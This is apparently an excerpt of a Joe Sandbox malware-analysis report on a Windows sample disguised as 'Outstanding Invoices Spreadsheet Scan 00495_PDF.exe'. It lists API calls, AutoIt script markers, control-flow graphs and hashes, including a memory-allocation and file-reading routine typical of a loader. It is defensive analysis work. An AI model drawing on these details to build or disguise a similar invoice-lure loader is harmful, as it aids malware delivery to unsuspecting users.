                                                                              • String ID: IsThemeActive$uxtheme.dll
                                                                              • API String ID: 2574300362-3542929980
                                                                              • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                              • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                              • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                              • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(00000001,00000000), ref: 00436AEF
                                                                              • FindFirstFileW.KERNELBASE(00000001,?), ref: 00436B00
                                                                              • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                              • String ID:
                                                                              • API String ID: 48322524-0
                                                                              • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                              • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                              • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                              • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                              • _fseek.LIBCMT ref: 004527FC
                                                                              • __wsplitpath.LIBCMT ref: 0045285C
                                                                              • _wcscpy.LIBCMT ref: 00452871
                                                                              • _wcscat.LIBCMT ref: 00452886
                                                                              • __wsplitpath.LIBCMT ref: 004528B0
                                                                              • _wcscat.LIBCMT ref: 004528C8
                                                                              • _wcscat.LIBCMT ref: 004528DD
                                                                              • __fread_nolock.LIBCMT ref: 00452914
                                                                              • __fread_nolock.LIBCMT ref: 00452925
                                                                              • __fread_nolock.LIBCMT ref: 00452944
                                                                              • __fread_nolock.LIBCMT ref: 00452955
                                                                              • __fread_nolock.LIBCMT ref: 00452976
                                                                              • __fread_nolock.LIBCMT ref: 00452987
                                                                              • __fread_nolock.LIBCMT ref: 00452998
                                                                              • __fread_nolock.LIBCMT ref: 004529A9
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                              • __fread_nolock.LIBCMT ref: 00452A39
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                              • String ID:
                                                                              • API String ID: 2054058615-0
                                                                              • Opcode ID: 18084b85f4461eeb31286f7725c60aadc876f9327bd23da621607a4a59327eb6
                                                                              • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                              • Opcode Fuzzy Hash: 18084b85f4461eeb31286f7725c60aadc876f9327bd23da621607a4a59327eb6
                                                                              • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                              • API String ID: 0-1896584978
                                                                              • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                              • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                                                              • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                              • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                              • __wsplitpath.LIBCMT ref: 00410C61
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcsncat.LIBCMT ref: 00410C78
                                                                              • __wmakepath.LIBCMT ref: 00410C94
                                                                                • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • _wcscpy.LIBCMT ref: 00410CCC
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                              • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                              • _wcscat.LIBCMT ref: 00429C43
                                                                              • _wcslen.LIBCMT ref: 00429C55
                                                                              • _wcslen.LIBCMT ref: 00429C66
                                                                              • _wcscat.LIBCMT ref: 00429C80
                                                                              • _wcsncpy.LIBCMT ref: 00429CC0
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                              • API String ID: 1004883554-2276155026
                                                                              • Opcode ID: 4dc9d493fc1f0bd93916e1b50bfde0fc01bc408925076b9d07e039c77bd8896c
                                                                              • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                              • Opcode Fuzzy Hash: 4dc9d493fc1f0bd93916e1b50bfde0fc01bc408925076b9d07e039c77bd8896c
                                                                              • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock$_fseek_wcscpy
                                                                              • String ID: FILE
                                                                              • API String ID: 3888824918-3121273764
                                                                              • Opcode ID: 0b8e7fb8d4654162d17f9f456e78b66f2dc64e424c61805434c56df38d84589e
                                                                              • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                              • Opcode Fuzzy Hash: 0b8e7fb8d4654162d17f9f456e78b66f2dc64e424c61805434c56df38d84589e
                                                                              • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32 ref: 00410326
                                                                              • RegisterClassExW.USER32 ref: 00410359
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                              • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                              • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                              • ImageList_ReplaceIcon.COMCTL32(00AC23C0,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                              • API String ID: 2914291525-1005189915
                                                                              • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                              • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                              • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                              • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                              • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                              • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                              • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                              • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                              • RegisterClassExW.USER32 ref: 004102C6
                                                                                • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00AC23C0,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                              • String ID: #$0$PGH
                                                                              • API String ID: 423443420-3673556320
                                                                              • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                              • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                              • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                              • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • _fseek.LIBCMT ref: 004525DA
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                              • __fread_nolock.LIBCMT ref: 00452618
                                                                              • __fread_nolock.LIBCMT ref: 00452629
                                                                              • __fread_nolock.LIBCMT ref: 00452644
                                                                              • __fread_nolock.LIBCMT ref: 00452661
                                                                              • _fseek.LIBCMT ref: 0045267D
                                                                              • _malloc.LIBCMT ref: 00452689
                                                                              • _malloc.LIBCMT ref: 00452696
                                                                              • __fread_nolock.LIBCMT ref: 004526A7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1911931848-0
                                                                              • Opcode ID: 54555e82c7d90f1f4c78fdc7dccdeb041d202529d94e6077e6c0a3b2fb9f910e
                                                                              • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                              • Opcode Fuzzy Hash: 54555e82c7d90f1f4c78fdc7dccdeb041d202529d94e6077e6c0a3b2fb9f910e
                                                                              • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 410 40f450-40f45c call 425210 413 40f460-40f478 410->413 413->413 414 40f47a-40f4a8 call 413990 call 410f70 413->414 419 40f4b0-40f4d1 call 4151b0 414->419 422 40f531 419->422 423 40f4d3-40f4da 419->423 424 40f536-40f540 422->424 425 40f4dc-40f4de 423->425 426 40f4fd-40f517 call 41557c 423->426 427 40f4e0-40f4e2 425->427 430 40f51c-40f51f 426->430 429 40f4e6-40f4ed 427->429 431 40f521-40f52c 429->431 432 40f4ef-40f4f2 429->432 430->419 435 40f543-40f54e 431->435 436 40f52e-40f52f 431->436 433 42937a-4293a0 call 41557c call 4151b0 432->433 434 40f4f8-40f4fb 432->434 447 4293a5-4293c3 call 4151d0 433->447 434->426 434->427 438 40f550-40f553 435->438 439 40f555-40f560 435->439 436->432 438->432 441 429372 439->441 442 40f566-40f571 439->442 441->433 444 429361-429367 442->444 445 40f577-40f57a 442->445 444->429 446 42936d 444->446 445->432 446->441 447->424
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock_fseek_strcat
                                                                              • String ID: AU3!$EA06
                                                                              • API String ID: 3818483258-2658333250
                                                                              • Opcode ID: 3a312acd4387509a524006497359dc3cfb623b7b4978b3f3d4501f18df932f25
                                                                              • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                              • Opcode Fuzzy Hash: 3a312acd4387509a524006497359dc3cfb623b7b4978b3f3d4501f18df932f25
                                                                              • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 450 410130-410142 SHGetMalloc 451 410148-410158 SHGetDesktopFolder 450->451 452 42944f-429459 call 411691 450->452 454 4101d1-4101e0 451->454 455 41015a-410188 call 411691 451->455 454->452 460 4101e6-4101ee 454->460 462 4101c5-4101ce 455->462 463 41018a-4101a1 SHGetPathFromIDListW 455->463 462->454 464 4101a3-4101b1 call 411691 463->464 465 4101b4-4101c0 463->465 464->465 465->462
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                              • String ID: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                                                                              • API String ID: 192938534-1496786758
                                                                              • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                              • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                              • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                              • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 468 2e54650-2e546fe call 2e52050 471 2e54705-2e5472b call 2e55560 CreateFileW 468->471 474 2e54732-2e54742 471->474 475 2e5472d 471->475 480 2e54744 474->480 481 2e54749-2e54763 VirtualAlloc 474->481 476 2e5487d-2e54881 475->476 478 2e548c3-2e548c6 476->478 479 2e54883-2e54887 476->479 482 2e548c9-2e548d0 478->482 483 2e54893-2e54897 479->483 484 2e54889-2e5488c 479->484 480->476 485 2e54765 481->485 486 2e5476a-2e54781 ReadFile 481->486 487 2e54925-2e5493a 482->487 488 2e548d2-2e548dd 482->488 489 2e548a7-2e548ab 483->489 490 2e54899-2e548a3 483->490 484->483 485->476 495 2e54783 486->495 496 2e54788-2e547c8 VirtualAlloc 486->496 491 2e5493c-2e54947 VirtualFree 487->491 492 2e5494a-2e54952 487->492 497 2e548e1-2e548ed 488->497 498 2e548df 488->498 493 2e548ad-2e548b7 489->493 494 2e548bb 489->494 490->489 491->492 493->494 494->478 495->476 499 2e547cf-2e547ea call 2e557b0 496->499 500 2e547ca 496->500 501 2e54901-2e5490d 497->501 502 2e548ef-2e548ff 497->502 498->487 508 2e547f5-2e547ff 499->508 500->476 505 2e5490f-2e54918 501->505 506 2e5491a-2e54920 501->506 504 2e54923 502->504 504->482 505->504 506->504 509 2e54801-2e54830 call 2e557b0 508->509 510 2e54832-2e54846 call 2e555c0 508->510 509->508 516 2e54848 510->516 517 2e5484a-2e5484e 510->517 516->476 518 2e54850-2e54854 CloseHandle 517->518 519 2e5485a-2e5485e 517->519 518->519 520 2e54860-2e5486b VirtualFree 519->520 521 2e5486e-2e54877 519->521 520->521 521->471 521->476
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 02E54721
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02E54947
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2042513613.0000000002E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E52000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2e52000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                              • Instruction ID: a080b1e4f449957bb01023bd71f5360f582adb871085a4df3f9c10fefd159366
                                                                              • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                              • Instruction Fuzzy Hash: 18A12774E50259EBDB14CFA4C895BEEB7B5BF48308F209159E901BB2C0D7799A80CF50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 522 414f10-414f2c 523 414f4f 522->523 524 414f2e-414f31 522->524 526 414f51-414f55 523->526 524->523 525 414f33-414f35 524->525 527 414f37-414f46 call 417f23 525->527 528 414f56-414f5b 525->528 539 414f47-414f4c call 417ebb 527->539 530 414f6a-414f6d 528->530 531 414f5d-414f68 528->531 534 414f7a-414f7c 530->534 535 414f6f-414f77 call 4131f0 530->535 531->530 533 414f8b-414f9e 531->533 537 414fa0-414fa6 533->537 538 414fa8 533->538 534->527 536 414f7e-414f89 534->536 535->534 536->527 536->533 541 414faf-414fb1 537->541 538->541 539->523 544 4150a1-4150a4 541->544 545 414fb7-414fbe 541->545 544->526 547 414fc0-414fc5 545->547 548 415004-415007 545->548 547->548 549 414fc7 547->549 550 415071-415072 call 41e6b1 548->550 551 415009-41500d 548->551 554 415102 549->554 555 414fcd-414fd1 549->555 557 415077-41507b 550->557 552 41500f-415018 551->552 553 41502e-415035 551->553 558 415023-415028 552->558 559 41501a-415021 552->559 561 415037 553->561 562 415039-41503c 553->562 560 415106-41510f 554->560 563 414fd3 555->563 564 414fd5-414fd8 555->564 557->560 565 415081-415085 557->565 566 41502a-41502c 558->566 559->566 560->526 561->562 567 415042-41504e call 41453a call 41ed9e 562->567 568 4150d5-4150d9 562->568 563->564 569 4150a9-4150af 564->569 570 414fde-414fff call 41ee9b 564->570 565->568 571 415087-415096 565->571 566->562 590 415053-415058 567->590 576 4150eb-4150fd call 417f23 568->576 577 4150db-4150e8 call 4131f0 568->577 572 4150b1-4150bd call 4131f0 569->572 573 4150c0-4150d0 call 417f23 569->573 579 415099-41509b 570->579 571->579 572->573 573->539 576->539 577->576 579->544 579->545 591 415114-415118 590->591 592 41505e-415061 590->592 591->560 592->554 593 415067-41506f 592->593 593->579
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
